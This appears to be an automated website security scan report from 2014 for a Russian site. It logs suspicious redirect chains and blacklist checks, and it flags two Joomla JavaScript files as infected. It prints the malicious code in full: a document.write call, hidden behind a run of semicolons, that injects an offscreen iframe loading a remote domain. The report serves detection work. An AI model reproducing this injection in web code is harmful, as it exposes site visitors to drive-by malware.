Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://techclining.ru/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: techclining.ru Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Cache-Control: no-cache Connection: close Date: Thu, 25 Sep 2014 10:30:24 GMT Pragma: no-cache Location: http://web-redirect.ru/?web Server: nginx/1.4.4 Content-Type: text/html; charset=utf-8 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: _cutt_caches_images=1411641024; expires=Fri, 26-Sep-2014 10:30:24 GMT; path=/ Set-Cookie: 84fad698d4dccdb50aec86bedd4f8de7=0fu5d90l5kj9cctr9t1i16lu25; path=/ X-Powered-By: PHP/5.3.27-pl0-gentoo | malicious |
URL: http://web-redirect.ru/?web (imitation of visitor from search engine) GET /?web HTTP/1.1 Host: web-redirect.ru Referer: http://www.google.com/search?q=redirect+check2 | HTTP/1.1 302 Found Cache-Control: max-age=0 Connection: close Date: Thu, 25 Sep 2014 10:30:25 GMT Pragma: no-cache Location: http://amantecrystal.com/components/com_weblinks/2/separator.php Server: nginx/1.0.15 Content-Length: 0 Content-Type: text/html; charset=utf-8 Expires: Thu, 21 Jul 1977 07:30:00 GMT Last-Modified: Thu, 25 Sep 2014 10:30:25 GMT X-Powered-By: PHP/5.3.3 | suspicious |
Scanned pages/files
Request | Server response | Status |
http://techclining.ru/ | 200 OK Content-Length: 17480 Content-Type: text/html | clean |
http://techclining.ru/media/system/js/mootools-core.js | 200 OK Content-Length: 96554 Content-Type: application/x-javascript | clean |
http://techclining.ru/media/system/js/core.js | 200 OK Content-Length: 4976 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) if("undefined"===typeof Joomla)var Joomla={};Joomla.editors={};Joomla.editors.instances={};Joomla.submitform=function(a,b){if("undefined"===typeof b&&(b=document.getElementById("adminForm"),!b))b=document.adminForm;if("undefined"!==typeof a&&''!==a)b.task.value=a;if("function"==typeof b.onsubmit)b.onsubmit();"function"==typeof b.fireEvent&&b.fireEvent("submit");b.submit()};Joomla.submitbutton=function(a){Joomla.submitform(a)}; Joomla.JText={strings:{},_:function(a,b){ ;;;;;;;;;;;;;;;;;;;;;;;;;document.write('<iframe height="20" width="20" style="position:absolute;left:-1000px;top:0;" src="http://tantalizingthrowing.ru/1ZA0t.Wd8xXxB05q6?default"></iframe>'); Antivirus reports:
| ||
http://techclining.ru/media/system/js/caption.js | 200 OK Content-Length: 921 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var JCaption=new Class({initialize:function(a){this.selector=a;$$(a).each(function(a){this.createCaption(a)},this)},createCaption:function(a){var f=document.createTextNode(a.title),c=document.createElement("div"),d=document.createElement("p"),e=a.getAttribute("width"),b=a.getAttribute("align");if(!e)e=a.width;b||(b=a.getStyle("float"));if(!b)b=a.style.styleFloat;if(b==""||!b)b="none";d.appendChild(f);d.className=this.selector.replace(".","_");a.parentNode.insertBefore(c,a);c.appendChild(a);a.title!= ""&&c.appendChild(d);c.className=this.selector.replace(".","_");c.className=c.className+" "+b;c.setAttribute("style","float:"+b);c.style.width=e+"px"}});;;;;;;;;;;;;;;;;;;;;;;;;;document.write('<iframe height="20" width="20" style="position:absolute;left:-1000px;top:0;" src="http://tantalizingthrowing.ru/1ZA0t.Wd8xXxB05q6?default"></iframe>'); Antivirus reports:
| ||
http://techclining.ru//mc.yandex.ru/metrika/watch.js/ | HTTP/1.1 303 See other Connection: close Date: Thu, 25 Sep 2014 10:30:31 GMT Location: http://techclining.ru//mc.yandex.ru/metrika/watch.js/ Server: nginx/1.4.4 Content-Length: 235 Content-Type: text/html; charset=utf-8 Set-Cookie: 84fad698d4dccdb50aec86bedd4f8de7=8bbncoj9h7jslf45fifaefgs17; path=/ X-Powered-By: PHP/5.3.27-pl0-gentoo | clean |
http://techclining.ru/test404page.js | 404 Not Found Content-Length: 1108 Content-Type: text/html | clean |
http://counter.rambler.ru/top100.jcn?2153041 | 200 OK Content-Length: 6853 Content-Type: application/x-javascript | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=techclining.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://techclining.ru/
Result: techclining.ru is not infected or malware details are not published yet.
Result: techclining.ru is not infected or malware details are not published yet.